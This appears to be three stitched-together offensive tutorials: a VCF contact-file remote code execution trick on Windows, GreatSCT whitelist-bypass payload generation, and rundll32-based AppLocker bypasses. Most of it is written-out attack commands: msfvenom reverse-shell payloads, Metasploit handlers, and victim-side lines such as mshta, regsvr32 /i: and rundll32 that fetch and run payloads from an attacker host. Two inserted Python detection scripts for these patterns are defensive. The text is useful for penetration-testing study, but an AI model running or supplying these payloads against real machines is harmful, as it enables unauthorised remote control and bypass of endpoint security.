Exploiting Windows PC using Malicious Contact VCF file


A huge shoutout to cyber security researcher John Page for bringing this vulnerability to the internet's attention on 15th January 2019. This was a 0-day exploit and of course works with the latest Windows 10 too. It is categorized as an "Insufficient UI warning remote code execution" vulnerability.
Introduction: Basically, what John discovered was that if we replace the website in a VCF file with the local path of a CPL file, Windows runs that file instead of opening the link in a browser. This is done by replacing the "http://" with "http.\\", which is totally insane, since a user would need multi-megapixel eyes to spot an intentional path error of that kind! So all we need to do is send the victim that VCF file along with our CPL file in a folder named "http" (it has to be "http" and nothing else for the local path inclusion to work) and we get a shell.
To read more about the research follow the link here.
Methodology:
1. Making an msfvenom Windows payload with a .dll extension.
2. Sending the dll file in a folder named "http".
3. Creating a contact file in the parent folder of "http".
4. Adding a website to the contact.
5. Changing the prefix of the website from http:// to http.\\
6. Renaming the dll file to ".cpl".
7. Running multi/handler in a terminal window.
8. Opening the website path from the contact.
9. Spawning a shell.
Proof of Concept:
The first step is to make a payload with a dll extension. For this purpose we are using msfvenom's Windows payload, but any other payload should work just fine.
In this case my local IP address is 192.168.1.109.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f dll > shell.dll


Next we transfer this payload to the victim machine in a new folder named "http". This has to be "http" and nothing else, since we are including a path in the website link later on, and the folder has to be in the current directory too. So we copy this shell.dll file onto the victim machine.



Next, and the most important step, is to make a contact VCF file. You can download a sample VCF and add a website to it, but we made a new contact file. The system we are using is Windows 10, so the version of the VCF file may differ from yours, but it would work just the same.



Add any name in the contact file.
I added Raj Chandel.



Traverse to the next tab, Home, and you'll see a text box to input a website. Add any website name you desire. I added my website's name "hackingarticles.in", but here is the most important thing you have to note:
A generic website link is http://www.hackingarticles.in, but we modify the prefix just a little by replacing the http:// with http.\\
This is because we don't actually want to include a website; we want to include a path to our DLL file, so that when the victim clicks on the website link our DLL runs.
Here, we are suffixing the website link with the ".cpl" extension. A CPL file is a Control Panel item, such as Display, Mouse, Sound, or Networking, used by the Windows operating system.


Save the contact. Now rename our payload from shell.dll to “www.hackingarticles.in.cpl”



Now we are prepped and ready to run the DLL file, so we set up multi/handler in a terminal window and open the contact on the victim's machine.


As soon as we click on the link, we see that a session is obtained in the Kali terminal!



This spawns a shell as the Windows user who is currently logged on.
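As an added defensive example (my own code, not John Page's PoC or anything from the article), the following Python scanner reads a .vcf file and flags website entries built the way described above: a link with no real scheme, backslashes where "://" belongs, or a name ending in an executable extension such as .cpl. The vCard parameter layout of the constructed sample (URL;TYPE=HOME:...) is an assumption; real Windows Contacts exports may lay the property out differently.

```python
"""Scan vCard (.vcf) text for website entries that point at a local
executable instead of a real URL, as in the http.\\ trick described above."""
import re

# File types Windows will run when a contact's website entry is "opened".
EXEC_EXTENSIONS = (".cpl", ".dll", ".exe", ".scr", ".lnk", ".hta", ".js", ".vbs")
# A genuine web link starts with a scheme followed by "://".
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*://")

def unfold(vcf_text):
    """Join vCard continuation lines (lines starting with a space or tab)."""
    lines = []
    for raw in vcf_text.splitlines():
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines

def url_values(vcf_text):
    """Yield the value of every URL property, e.g. 'URL;TYPE=HOME:...'."""
    for line in unfold(vcf_text):
        name, sep, value = line.partition(":")
        if sep and name.split(";")[0].strip().upper() == "URL":
            yield value.strip()

def suspicious_urls(vcf_text):
    """Return (value, reasons) for each website entry that should be blocked."""
    findings = []
    for value in url_values(vcf_text):
        target = value.split("?")[0].split("#")[0].lower()
        reasons = []
        if not SCHEME_RE.match(value):
            reasons.append("no URL scheme: Windows treats it as a local path")
        if "\\" in value:
            reasons.append("backslashes where :// is expected")
        if target.endswith(EXEC_EXTENSIONS):
            reasons.append("link name ends in an executable extension")
        if reasons:
            findings.append((value, reasons))
    return findings

# Constructed sample card: one mangled entry and one genuine website.
# The vCard parameter layout is assumed; real exports may differ.
SAMPLE_VCF = (
    "BEGIN:VCARD\r\nVERSION:3.0\r\nFN:Example Contact\r\n"
    "URL;TYPE=HOME:http.\\\\www.example-site.invalid.cpl\r\n"
    "URL;TYPE=WORK:https://www.example-site.invalid\r\n"
    "END:VCARD\r\n"
)

if __name__ == "__main__":
    for value, reasons in suspicious_urls(SAMPLE_VCF):
        print(value, "->", "; ".join(reasons))
```

A mail gateway or endpoint script can run this over inbound .vcf attachments and quarantine any card that produces findings.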
Conclusion: This is an amazing vulnerability discovered by John Page, and all versions of Windows that support contact VCF files are affected by it. As you can see, we have spawned a Windows 10 shell here, so it is safe to say that lower versions are affected too. To read more about the discovery, follow the link to John Page's website here. Thanks for reading.


GreatSct - An Application Whitelist Bypass Tool


While writing the AppLocker bypass series, we found a new tool which was especially designed for bypassing application whitelisting. So I decided to write this article, in which we introduce another very interesting tool, "Great SCT – A Metasploit payload generator". It is similar to Unicorn or msfvenom because it depends on the Metasploit framework to provide the reverse connection from the victim's machine. So let's begin with its tutorial and check its functionality.
Table of Contents
- GreatSCT
- Installation & Usage
- Generate malicious hta file
- Generate malicious sct file
- Generate malicious dll file

GreatSCT
GreatSCT is currently maintained by @ConsciousHacker; the project is called Great SCT (Great Scott). Great SCT is an open source project to generate application whitelist bypasses. This tool is intended for BOTH red and blue teams. It is designed to generate Metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions.
You can download it from here: https://github.com/GreatSCT/GreatSCT
Installation & Usage
It must first be downloaded and installed in order to start using Great SCT. Run the following commands to download Great SCT from GitHub; the setup script also takes care of its dependencies while installing it.

git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT
cd setup
./setup.sh

It helps to bypass AppLocker policy by using the following tools:
- InstallUtil.exe: The Installer tool is a command-line tool that lets you install and uninstall server resources in specific assemblies by running the installer components.
- MSBuild.exe: The Microsoft Build Engine is a platform for building applications; this engine is also known as MSBuild.
- Mshta.exe: Mshta.exe runs the Microsoft HTML Application Host, the Windows OS utility responsible for running HTA (HTML Application) files, HTML files in which we can run JavaScript or VBScript.
- Regasm.exe: The Assembly Registration tool reads the metadata within an assembly and adds the necessary entries to the registry, which allows COM clients to create .NET Framework classes transparently.
- Regsvcs.exe: RegSvcs stands for Microsoft .NET Remote Registry Services; it is known as the .NET Services Installation tool.
- Regsvr32.exe: Regsvr32 is a command-line utility to register and unregister OLE controls, such as DLLs and ActiveX controls, in the Windows Registry.

Once it's downloaded and running, type the following command to select the Bypass tool:
use Bypass
Now to get the list of payloads type :
list
Generate malicious hta file 

Now from the list of payloads you can choose any one for your desired attack. For this attack we will use:
use mshta/shellcode_inject/base64_migrate.py
Once the command is executed, type:
generate
After executing the generate command, it asks which method you want to use. As we are going to use msfvenom, type 1 to choose the first option. Then press enter for meterpreter. Then provide lhost and lport, i.e. 192.168.1.107 and 4321 respectively.

When generating the shellcode, it will ask you to give a name for the payload. By default it will take 'payload' as the name. As I didn't want to give any name, I simply pressed enter.
Now it has made two files: one resource file and one hta file.
First, start Python's web server in /usr/share/greatsct-output by typing:
python -m SimpleHTTPServer 80
Now execute the hta file in the command prompt of the victim's PC:
mshta.exe http://192.168.1.107/payload.hta
Simultaneously, start the multi/handler using the resource file. For this, type:
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
And voila! You have your session.
Visit "Bypass Application Whitelisting using mshta.exe (Multiple Methods)" to learn more about mshta.exe techniques.

Generate malicious sct file 

Now from the list of payloads you can choose any one for your desired attack. For this attack we will use:
use regsvr/shellcode_inject/base64_migrate.py

Once the command is executed, type:
generate

Then it will ask you for the payload. Just press enter, as it will take windows/meterpreter/reverse_tcp as the default payload, and that is the one we need. After that provide the IP (here we have given 192.168.1.107) and then any port; as you can see in the image below, we have given lport as 2345.
After giving the details, it will ask you for a name for your malware. By default it will set the name 'payload', so either you can give a name or just press enter for the default settings.

Just as you press enter, it will generate two files: one of them will be a resource file and the other the .sct file. Start Python's web server in /usr/share/greatsct-output by typing:
python -m SimpleHTTPServer 80
Now execute the .sct file in the run window of the victim's PC as shown below:
regsvr32 /u /n /s /i:http://192.168.1.107/payload.sct
Simultaneously, start the multi/handler using the resource file. For this, type:
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
And voila! You have your session.
Visit "Bypass Application Whitelisting using regsvr32.exe (Multiple Methods)" to learn more about regsvr32.exe techniques.

Generate malicious dll file 
Now from the list of payloads you can choose any one for your desired attack. For this attack we will use:
use regasm/meterpreter/rev_tcp.py

Once the command is executed, type:
set lhost 192.168.1.107
generate

After giving the details, it will ask you for a name for your malware. By default it will set the name 'payload', so either you can give a name or just press enter for the default settings.

Just as you press enter, it will generate two files: one of them will be a resource file and the other the .dll file. Start Python's web server in /usr/share/greatsct-output by typing:
python -m SimpleHTTPServer 80
Now place the above generated dll file inside C:\Windows\Microsoft.NET\Framework\v4.0.30319\ and then execute the .dll file in the run window of the victim's PC as shown below:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U payload.dll

Simultaneously, start the multi/handler using the resource file. For this, type:
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
And voila! You have your session.

Bypass Application Whitelisting using rundll32.exe (Multiple Methods)


The purpose of this post is to demonstrate the most common and familiar techniques of AppLocker whitelisting bypass. As we know, for security reasons the system admin adds group policies to restrict app execution for local users. In our previous article, "Windows AppLocker Policy – A Beginner's Guide", we discussed how AppLocker rules define your application control policies and how to work with them. But today you will learn how to bypass AppLocker policies with RunDLL files.
Table of Contents
- Introduction
- Working of DLL files
- Advantages
- Disadvantages
- Different methods for AppLocker Bypass using DLL files
- Conclusion
Introduction
DLL files are important for the Windows OS to work, and they also determine the working of other programs that customise your Windows. Dynamic Link Library (DLL) files are a type of file which provides instructions to other programs on how to call upon certain things. Therefore, multiple programs can share such DLL files, even simultaneously. In spite of being in the same format as .exe files, DLL files are not directly executable like .exe files. DLL file extensions can be: .dll (Dynamic Link Library), .OCX (ActiveX Controls), .CPL (Control Panel), .DRV (Device Drivers).
Working
When in use, DLL files are divided into sections. This makes the working of DLL files easier and faster. Each section is loaded into the main program at run time. As each section is different and independent, load time is faster, and loading is only done when the functionality of the said file is required. This ability also makes upgrades easier to apply without affecting other sections. For example: you have a dictionary program and new words are added every month; all you have to do is update the dictionary DLL, without needing to install a whole other program for it.
Advantages
- Uses fewer resources
- Promotes modular architecture
- Eases deployment and installation
Disadvantages
- A dependent DLL is upgraded to a new version.
- A dependent DLL is fixed.
- A dependent DLL is overwritten with an earlier version.
- A dependent DLL is removed from the computer.
Methods
- Smb_Delivery
- MSFVenom
- Koadic
- JSRat
Our first method uses smb_delivery. To use this method, open the terminal in Kali and type the following commands:
msfconsole
use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.107
msf exploit(windows/smb/smb_delivery) > exploit
Now run the malicious code through rundll32.exe on the Windows machine to obtain a meterpreter session.
When the above module runs, it will provide you with a command that is to be executed on the victim's PC in order to get a session. So copy and paste the said command in the run window of the victim's PC as shown in the image below:
rundll32.exe \\192.168.1.107\ZtmW\test.dll,0
As soon as the command is executed, you will have your meterpreter session. To access the session type:
sessions 1
sysinfo
MSFVenom
Our second method is via msfvenom. To use this method, type the following command in the Kali terminal:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 -f dll > 1.dll
Once the payload is created, copy it to the victim's PC and run the following command in the run window:
rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\1.dll

Simultaneously, start the multi/handler to get a session by typing:
msfconsole
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.107
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

Koadic
Our next method uses the Koadic framework. Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and PowerShell Empire. To know more about Koadic, please read our detailed article on the framework at this link: https://www.hackingarticles.in/koadic-com-command-control-framework
Once Koadic is up and running, type:
use stager/js/rundll32_js
set SRVHOST 192.168.1.107
run

Running the stager will give you a command. Copy that command (from rundll32.exe up to 6.0") and paste it in the command prompt of the victim's PC.
Once you run the command in cmd, you will have your session, as shown in the following image.
To access the session type:
zombies 0
Now the dilemma is: what to do if the command prompt is blocked on the victim's PC?
If the command line is blocked, there is a script developed by Didier Stevens. You can find it at the following link:
By visiting the above URL, you will download a zip file. Extract that zip file and use the following command to run the said file from the run window:
rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\cmd.dll

As soon as you run the command, you will have unblocked cmd, as shown below:
JSRat
Our next method is by using JSRat, which you can download from GitHub. This is another very small command and control framework, just like Koadic and PowerShell Empire, for generating malicious tasks only for rundll32.exe and regsvr32.exe. JSRat will create a web server, and on that web server we will find our .sct file. To use this method type:
./JSRat.py -I 192.168.1.107 -p 4444
Once JSRat starts working, it will give you a link to open in a browser. That webpage will contain the code which is to be executed on the victim's PC.
Therefore, open the http://192.168.1.107/wtf link in your browser. There you will find the said code, as shown in the image below:
Run that code in the command prompt of the victim's PC as shown:
And voila, you will have a session, as in the image below:
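As an added defensive example, written for this page and not taken from the article or from GreatSCT, Koadic or JSRat, the Python below checks process-creation records for the LOLBin patterns used in this post and the preceding GreatSCT post: mshta.exe launching a remote .hta, regsvr32.exe pulling a scriptlet via /i:, regasm.exe /U on an assembly, and rundll32.exe loading a DLL from a UNC path or through shell32's Control_RunDLL. The Sysmon-like field names (Image, CommandLine, ProcessId) and the sample events are assumptions; adapt the keys to your own log source.

```python
"""Flag process-creation records matching the whitelist-bypass patterns
discussed above (mshta, regsvr32, regasm and rundll32 abuse)."""
import re

# (image name, pattern over the command line, reason reported on a hit)
RULES = [
    ("mshta.exe", re.compile(r"https?://|\\\\[^\\]+\\", re.I),
     "mshta.exe launching an HTA from a URL or UNC share"),
    ("regsvr32.exe", re.compile(r"/i:\s*(https?:|\\\\)", re.I),
     "regsvr32.exe loading a scriptlet from a remote location"),
    ("regasm.exe", re.compile(r"(^|\s)/u\b", re.I),
     "regasm.exe /U: unregistration runs code from the named assembly"),
    ("rundll32.exe", re.compile(r"\\\\[^\\]+\\[^,\s]+\.dll|Control_RunDLL", re.I),
     "rundll32.exe loading a DLL from a UNC path or via Control_RunDLL"),
]

def image_name(image):
    """Lower-case file name of an image path (either slash style)."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(event):
    """Return the reasons a single event matches; an empty list means benign."""
    name = image_name(event["Image"])
    return [reason for binary, pattern, reason in RULES
            if name == binary and pattern.search(event["CommandLine"])]

def scan(events):
    """Return (ProcessId, reason) pairs for every matching event."""
    return [(e["ProcessId"], r) for e in events for r in evaluate(e)]

# Constructed sample events in a Sysmon-like shape (field names assumed).
SAMPLE_EVENTS = [
    {"ProcessId": 101, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://192.0.2.10/payload.hta"},
    {"ProcessId": 102, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32 /u /n /s /i:http://192.0.2.10/payload.sct"},
    {"ProcessId": 103, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe",
     "CommandLine": "regasm.exe /U payload.dll"},
    {"ProcessId": 104, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe \\192.0.2.10\share\test.dll,0"},
    {"ProcessId": 105, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 shell32.dll,Control_RunDLL C:\Users\u\Downloads\x.dll"},
    {"ProcessId": 106, "Image": r"C:\Windows\System32\rundll32.exe",  # benign
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL C:\t.txt"},
]

if __name__ == "__main__":
    for pid, reason in scan(SAMPLE_EVENTS):
        print(pid, reason)
```

Every hit here is a single command line that AppLocker's default rules still allow, which is why command-line logging plus these rules (or equivalent Sysmon/EDR rules) belongs beside the policy itself.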

Conclusion
DLL files are collections of code and procedures held together. These files help Windows programs to execute correctly. They were created so that multiple programs can use them simultaneously, which helps conserve memory. Therefore these files are important and required by Windows to run properly without causing users any kind of problem. Hence, exploitation through such files is very efficient and lethal, and the methods presented above are different ways to do it.